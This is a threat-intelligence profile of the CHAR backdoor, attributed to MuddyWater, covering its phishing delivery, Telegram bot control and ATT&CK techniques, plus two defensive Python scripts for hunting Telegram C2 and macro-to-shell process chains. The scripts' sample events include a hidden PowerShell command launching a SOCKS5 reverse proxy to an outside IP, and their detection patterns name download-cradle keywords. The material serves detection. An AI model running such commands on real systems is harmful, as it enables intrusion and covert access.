Mallory · Malware · Used by 2 actors

CHAR

CHAR is a Rust-based backdoor attributed to the Iranian state-linked threat actor MuddyWater, including activity tracked as Operation Olalampo. Reporting places its use from at least January 2026 in campaigns primarily targeting organizations and individuals in the Middle East and North Africa; broader reporting links MuddyWater targeting to the energy, maritime, diplomatic, financial, telecom, and critical-infrastructure sectors.

In documented attack chains, CHAR was delivered by phishing emails carrying malicious Microsoft Office or Excel documents that relied on the recipient enabling macros. Reporting also states that, during the same campaign, MuddyWater exploited recently disclosed vulnerabilities on public-facing servers for initial access.

CHAR uses Telegram for command and control through the bot identified as stager_51_bot, also described as the Telegram bot with first name "Olalampo". Its confirmed capabilities are changing directories and executing cmd.exe or PowerShell commands. Reported PowerShell tasking included executing a SOCKS5 reverse proxy, executing another backdoor named Kalim, stealing and uploading browser data, and running executables named sh.exe and gshdoc_release_X64_GUI.exe.

Multiple sources describe CHAR as part of a broader MuddyWater toolset alongside GhostFetch, HTTP_VIP, GhostBackDoor, RustyWater, Phoenix, and the Fooder loader. Group-IB reported signs of possible AI-assisted development in CHAR-related tooling, specifically emojis in debug strings, and noted structural similarities to the Rust-based BlackBeard malware family, also referred to as Archer RAT and RUSTRIC.
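Because CHAR is tasked through a Telegram bot, its C2 traffic is ordinary HTTPS to api.telegram.org, which blends into allowed traffic but is also cheap to hunt. The script below is an added example, not code from this page or from any of the cited vendors. It scores web-proxy log lines for Telegram Bot API use: a workstation that long-polls getUpdates is acting as the bot's receive side, which is the generic shape of a Telegram-controlled backdoor (an assumption about the pattern, not a documented detail of CHAR's API usage), and file uploads via sendDocument are the obvious exfiltration path. The log format, hostnames and bot tokens are constructed, and bot secrets are redacted before they reach a finding.

```python
"""Hunt for Telegram Bot API command-and-control in web-proxy logs.

Added example (not from the page or any vendor). Assumes a proxy that logs
full URLs, i.e. TLS inspection; without it only the api.telegram.org host is
visible and the per-host counting below still applies to that.
"""
import re
from collections import defaultdict

# Constructed sample proxy log: "<ts> <src_host> <method> <url> <user_agent>".
# The bot tokens are fake and exist only for this example.
SAMPLE_PROXY_LOG = """\
2026-02-03T09:00:01Z WS-0142 GET https://api.telegram.org/bot1234567890:AAFakeTokenForExample/getUpdates?offset=71&timeout=30 hyper/1.0
2026-02-03T09:00:32Z WS-0142 GET https://api.telegram.org/bot1234567890:AAFakeTokenForExample/getUpdates?offset=72&timeout=30 hyper/1.0
2026-02-03T09:00:33Z WS-0142 POST https://api.telegram.org/bot1234567890:AAFakeTokenForExample/sendDocument hyper/1.0
2026-02-03T09:01:04Z WS-0142 GET https://api.telegram.org/bot1234567890:AAFakeTokenForExample/getUpdates?offset=73&timeout=30 hyper/1.0
2026-02-03T09:02:10Z WS-0077 GET https://web.telegram.org/a/ Mozilla/5.0
2026-02-03T09:02:11Z WS-0077 POST https://api.telegram.org/bot9876543210:AAAnotherFakeToken/sendMessage Mozilla/5.0
2026-02-03T09:03:00Z WS-0201 GET https://www.example.com/ Mozilla/5.0
"""

# Bot API URL shape: https://api.telegram.org/bot<numeric id>:<secret>/<method>
BOT_API_RE = re.compile(
    r"^https://api\.telegram\.org/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]+)/(?P<method>[A-Za-z]+)"
)
# getUpdates calls from one host before we treat it as the bot's receive side
# (an implant polling for tasking) rather than a one-off. Assumed threshold.
POLL_THRESHOLD = 3
UPLOAD_METHODS = {"sendDocument", "sendPhoto", "sendVideo", "sendAudio"}


def parse_line(line):
    """Split one proxy line into (host, method, url, user_agent); None if malformed."""
    parts = line.split(" ", 4)
    if len(parts) != 5:
        return None
    _ts, host, method, url, ua = parts
    return host, method, url, ua


def redact_token(bot_id, secret):
    """Keep the numeric bot id (a pivot across hosts) but never record the secret."""
    return f"{bot_id}:{secret[:2]}***"


def hunt_telegram_bot_c2(log_text):
    """Return {host: finding} for every host that calls the Telegram Bot API."""
    per_host = defaultdict(lambda: {"polls": 0, "methods": set(), "tokens": set(), "agents": set()})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        host, _method, url, ua = rec
        m = BOT_API_RE.match(url)
        if not m:
            continue  # web.telegram.org and other non-bot traffic is out of scope
        stats = per_host[host]
        stats["methods"].add(m["method"])
        stats["tokens"].add(redact_token(m["bot_id"], m["secret"]))
        stats["agents"].add(ua)
        if m["method"] == "getUpdates":
            stats["polls"] += 1

    findings = {}
    for host, s in per_host.items():
        reasons = []
        if s["polls"] >= POLL_THRESHOLD:
            reasons.append(f"long-polls getUpdates ({s['polls']}x): host is acting as the bot backend")
        uploads = s["methods"] & UPLOAD_METHODS
        if uploads:
            reasons.append("uploads files via " + ", ".join(sorted(uploads)))
        severity = "high" if reasons else "low"
        if not reasons:
            reasons.append("bot API use from a workstation (confirm it is not a developer's own bot)")
        findings[host] = {
            "severity": severity,
            "bot_tokens": sorted(s["tokens"]),
            "methods": sorted(s["methods"]),
            "user_agents": sorted(s["agents"]),
            "reasons": reasons,
        }
    return findings


if __name__ == "__main__":
    for host, f in sorted(hunt_telegram_bot_c2(SAMPLE_PROXY_LOG).items()):
        print(host, f["severity"], f["bot_tokens"], f["user_agents"], f["reasons"])
```

Full URLs only appear when the proxy inspects TLS; without inspection, count connections to api.telegram.org per host and apply the same threshold. The bot id (the digits before the colon in the token) survives redaction and is a usable pivot across hosts, and a non-browser User-Agent such as a Rust HTTP client string on a workstation is a second cheap filter.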


THREAT ACTORS

Groups observed using it

2 threat-actor entries attributed by public researchers. Both entries name the same group, MuddyWater, written differently by the two sources.
MuddyWater

MuddyWater's Operation Olalampo deployed... CHAR, a Rust-based backdoor controlled via Telegram bot stager_51_bot...

via Centripetal threat research (centripetal.ai)
Muddy Water

stager_51_bot Telegram Bot C2 Muddy Water (CHAR backdoor)

via Halcyon Attacks Lookout (halcyon.ai)
MITRE ATT&CK

Techniques & procedures

23 distinct techniques documented for this family, organized by ATT&CK tactic. Several of the evidence excerpts below describe sibling MuddyWater tooling (GhostBackDoor, MuddyRot, TWINTALK, PowerGoop) or 2024 campaign activity that predates CHAR, so treat the mapping as toolset-level until a CHAR sample confirms a given technique.

Initial Access

2 techniques

T1566 Phishing (evidence: 2)

From February to July 2024, more than 50 phishing emails were observed across 10+ sectors with hundreds of recipients.

T1566.001 Spearphishing Attachment (evidence: 6)

Initial Access: Spear-phishing with malicious Word docs/VBA macros (T1566.001), macro execution (T1204.002).

Execution

4 techniques

T1059 Command and Scripting Interpreter (evidence: 2)

"GhostBackDoor... supports an interactive shell"; "...retrieve instructions to start an interactive shell"

T1059.001 PowerShell (evidence: 2)

Execution & Persistence: PowerShell/PowerGoop, Rust-based implants (RustyWater/CHAR/Archer RAT), registry Run keys, scheduled tasks (T1059.001, T1547.001).

T1059.003 Windows Command Shell (evidence: 1)

"change directory and execute a cmd.exe ... command"

T1204.002 Malicious File (evidence: 5)

Initial Access: Spear-phishing with malicious Word docs/VBA macros (T1566.001), macro execution (T1204.002).
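The execution evidence above amounts to two process-tree patterns: an Office application spawning cmd.exe or PowerShell when the macro runs, and a user-land implant spawning the shells it is tasked with, including the SOCKS5 reverse proxy and the sh.exe and gshdoc_release_X64_GUI.exe executables the page reports. The following is an added example, not code from the page or from any vendor, that evaluates Sysmon-style process-creation events against those patterns. The event lines, hostnames, file paths and the update.exe and socks5.exe names are constructed; only sh.exe and gshdoc_release_X64_GUI.exe come from the page, and they are used as a watchlist rather than a signature.

```python
"""Process-tree rules for the macro -> shell -> backdoor-tasking chain.

Added example; paths, thresholds and sample events are assumptions, not page data.
"""
import re
from dataclasses import dataclass

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Names the page reports CHAR tasking executed. A watchlist, not a signature:
# a rename blinds it, so the parent/child rules below carry the weight.
PAGE_WATCHLIST = {"sh.exe", "gshdoc_release_x64_gui.exe"}
# Directories writable without admin rights, where a macro-dropped implant
# typically lives (assumed locations, not from the page).
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\")
# PowerShell command-line traits worth tagging; "socks-proxy" covers the
# SOCKS5 reverse-proxy tasking the page reports.
PS_TRAITS = {
    "encoded": re.compile(r"(?i)\s-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}"),
    "hidden": re.compile(r"(?i)-w(indowstyle)?\s+hidden"),
    "no-profile": re.compile(r"(?i)-nop(rofile)?\b"),
    "download": re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|net\.webclient"),
    "socks-proxy": re.compile(r"(?i)socks5?"),
}

# Constructed Sysmon-style events: ts|host|parent_image|image|command_line
SAMPLE_EVENTS = """\
2026-02-03T08:55:10Z|WS-0142|C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE|C:\\Windows\\System32\\cmd.exe|cmd.exe /c start /min C:\\Users\\u\\AppData\\Roaming\\update.exe
2026-02-03T08:55:12Z|WS-0142|C:\\Users\\u\\AppData\\Roaming\\update.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -nop -w hidden -c "Start-Process C:\\Users\\u\\AppData\\Local\\Temp\\socks5.exe -ArgumentList '-r 203.0.113.10:443'"
2026-02-03T08:55:20Z|WS-0142|C:\\Users\\u\\AppData\\Roaming\\update.exe|C:\\Windows\\System32\\cmd.exe|cmd.exe /c C:\\Users\\u\\AppData\\Local\\Temp\\sh.exe
2026-02-03T09:10:00Z|WS-0310|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -File C:\\Scripts\\inventory.ps1
2026-02-03T09:12:00Z|WS-0310|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\ipconfig.exe|ipconfig /all
"""


@dataclass
class Finding:
    host: str
    rule: str
    severity: str
    image: str
    tags: list


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_event(line):
    """Split one pipe-delimited event; None if malformed."""
    parts = line.split("|", 4)
    if len(parts) != 5:
        return None
    ts, host, parent, image, cmdline = parts
    return {"ts": ts, "host": host, "parent": parent, "image": image, "cmdline": cmdline}


def evaluate(ev):
    """Apply the rules to one process-creation event; returns a list of Findings."""
    findings = []
    parent, image = basename(ev["parent"]), basename(ev["image"])
    traits = ([n for n, rx in PS_TRAITS.items() if rx.search(ev["cmdline"])]
              if image in ("powershell.exe", "pwsh.exe") else [])
    if image in SHELLS and parent in OFFICE_PARENTS:
        # Macro execution: the document's host process spawning a shell (T1204.002 -> T1059).
        findings.append(Finding(ev["host"], "office-spawns-shell", "high", image, traits))
    elif image in SHELLS and any(d in ev["parent"].lower() for d in USER_WRITABLE):
        # A binary in a user-writable directory driving cmd/PowerShell: backdoor tasking.
        findings.append(Finding(ev["host"], "shell-from-user-writable-parent",
                                "high" if traits else "medium", image, traits))
    elif traits:
        findings.append(Finding(ev["host"], "suspicious-powershell-flags", "medium", image, traits))
    # Watchlist names, whether run directly or handed to a shell on the command line.
    names = {image} | {basename(t.strip("\"'")) for t in ev["cmdline"].split()}
    hits = sorted(names & PAGE_WATCHLIST)
    if hits:
        findings.append(Finding(ev["host"], "page-watchlist-name", "medium", image, hits))
    return findings


def hunt_process_events(text):
    """Run every event in a pipe-delimited log through evaluate()."""
    out = []
    for line in text.splitlines():
        ev = parse_event(line)
        if ev:
            out.extend(evaluate(ev))
    return out


if __name__ == "__main__":
    for f in hunt_process_events(SAMPLE_EVENTS):
        print(f"{f.host} {f.severity:6} {f.rule:32} {f.image} {f.tags}")
```

The office-spawns-shell rule is the one to alert on outright; the user-writable-parent rule needs tuning against legitimate updaters in AppData, and the watchlist only adds a medium-severity corroboration because the names are trivially changed by the operator.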

Persistence

1 technique

T1547.001 Registry Run Keys / Startup Folder (evidence: 1)

Execution & Persistence: PowerShell/PowerGoop, Rust-based implants (RustyWater/CHAR/Archer RAT), registry Run keys, scheduled tasks (T1059.001, T1547.001).

Privilege Escalation

2 techniques

T1055 Process Injection (evidence: 1)

The RustyWater implant and the CHAR backdoor represent the apex of this evolution, incorporating asynchronous C2 communication, process injection, layered encryption

T1547.001 Registry Run Keys / Startup Folder (evidence: 1)

Execution & Persistence: PowerShell/PowerGoop, Rust-based implants (RustyWater/CHAR/Archer RAT), registry Run keys, scheduled tasks (T1059.001, T1547.001).

Defense Evasion (labelled "Stealth" on the page)

3 techniques

T1027 Obfuscated Files or Information (evidence: 1)

Defense Evasion: Obfuscation, reflective loading, disabling security tools, living-off-the-land (T1027, T1620, T1562).

T1055 Process Injection (evidence: 1)

The RustyWater implant and the CHAR backdoor represent the apex of this evolution, incorporating asynchronous C2 communication, process injection, layered encryption

T1620 Reflective Code Loading (evidence: 1)

Defense Evasion: Obfuscation, reflective loading, disabling security tools, living-off-the-land (T1027, T1620, T1562).

Credential Access

2 techniques

T1539 Steal Web Session Cookie (evidence: 1)

"...upload data stolen from web browsers..." (the excerpt supports browser-data theft in general; cookie theft specifically is an inference from it)

T1555.003 Credentials from Web Browsers (evidence: 1)

Credential Access & Collection: Browser credential dumping, system info gathering (T1555.003, T1082).

Discovery

1 technique

T1082 System Information Discovery (evidence: 1)

Credential Access & Collection: Browser credential dumping, system info gathering (T1555.003, T1082).

Command and Control

8 techniques

T1071 Application Layer Protocol (evidence: 1)

Sekoia TDR (July 2024) independently documented the same implant under the name MuddyRot, with matching characteristics: mutex "DocumentUpdater," TCP port 443, and identical string obfuscation logic. (This describes MuddyRot, not CHAR.)

T1071.001 Web Protocols (evidence: 2)

TWINTALK, a C2 orchestrator that beacons via JWT-authenticated HTTPS with randomized delays (108–180 seconds). (This describes TWINTALK, not CHAR.)

T1071.005 Publish/Subscribe Protocols (evidence: 1)

Excel lure (energy/maritime company) -> CHAR (Rust backdoor with Telegram C2). (The Telegram Bot API is plain HTTPS to api.telegram.org, so for hunting purposes this is web-service traffic; T1102.002 below is the closer mapping.)

T1090 Proxy (evidence: 1)

"PowerShell command is designed to execute a SOCKS5 reverse proxy"

T1090.003 Multi-hop Proxy (evidence: 2)

Command and control operates through Telegram dead drops, JWT-authenticated HTTPS with randomized URI paths, and Cloudflare-fronted infrastructure that masks backend servers from conventional blocking.

T1102 Web Service (evidence: 2)

"Char, a Rust-based backdoor controlled via a Telegram bot"

T1102.001 Dead Drop Resolver (evidence: 1)

Command and control operates through Telegram dead drops, JWT-authenticated HTTPS with randomized URI paths, and Cloudflare-fronted infrastructure that masks backend servers from conventional blocking.

T1102.002 Bidirectional Communication (evidence: 2)

"CHAR, a Rust backdoor that's controlled by a Telegram bot..."

Exfiltration

1 technique

T1041 Exfiltration Over C2 Channel (evidence: 2)

Command & Control / Exfiltration: Custom C2 (HTTP, encrypted channels), data staging (T1071.001, T1041).

Defense Evasion (listed as "Other" on the page; T1562 is a Defense Evasion technique in ATT&CK)

1 technique

T1562 Impair Defenses (evidence: 1)

Defense Evasion: Obfuscation, reflective loading, disabling security tools, living-off-the-land (T1027, T1620, T1562).

INDICATORS OF COMPROMISE

IOCs tracked for this family

1 indicator attributed across vendor reports, sandbox runs, and researcher write-ups; its value is not shown on this page.

Network (1 tracked): IPs, domains, and DNS infrastructure linked to this family.

Type: domain
Value: ●●●●●●●●●●●● (masked on the page)
Latest sighting: 3 months ago